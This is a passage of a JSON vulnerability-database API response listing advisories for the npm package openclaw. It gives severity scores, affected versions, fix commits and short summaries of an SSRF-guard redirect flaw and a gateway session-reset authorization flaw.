                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3cw3-5vxw-g2h3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41342",
                "GHSA-3cw3-5vxw-g2h3"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wkye-je9r-1fba"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90198?format=api",
            "vulnerability_id": "VCID-wmr3-83u3-6qdb",
            "summary": "OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n## Impact\n\n`fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects.\n\nA guarded fetch could resend unsafe request bodies or headers when following cross-origin redirects.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<2026.3.31`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @BG0ECV for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40037",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11509",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11475",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11511",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40037"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qx8j-g322-qj6m",
                    "reference_id": "GHSA-qx8j-g322-qj6m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qx8j-g322-qj6m"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-40037",
                "GHSA-qx8j-g322-qj6m"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wmr3-83u3-6qdb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91253?format=api",
            "vulnerability_id": "VCID-wut7-y72y-9ucb",
            "summary": "OpenClaw: Gateway agent /reset exposes admin session reset to operator.write callers\n## Summary\nBefore `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/new` for callers with only `operator.write`, even though the direct `sessions.reset` RPC correctly requires `operator.admin`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable path lived in `src/gateway/server-methods/agent.ts`. A `/reset` or `/new` message with an explicit `sessionKey` reached `performGatewaySessionReset(...)` without enforcing the same `operator.admin` guard used by `sessions.reset`.\n\n## Fix Commit(s)\n- `50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0` — `fix(gateway): require admin for agent session reset`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server-methods/agent.ts` now rejects `/reset` and `/new` for callers that do not have `operator.admin` before calling `performGatewaySessionReset(...)`.\n- `src/gateway/server-methods/agent.test.ts` contains the regression test `rejects /reset for write-scoped gateway callers`.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35660",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00052",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16539",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00052",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16494",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00052",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16536",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35660"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35660",
                    "reference_id": "CVE-2026-35660",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35660"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wq58-2pvg-5h4f",
                    "reference_id": "GHSA-wq58-2pvg-5h4f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wq58-2pvg-5h4f"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset",
                    "reference_id": "openclaw-insufficient-access-control-in-gateway-agent-session-reset",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
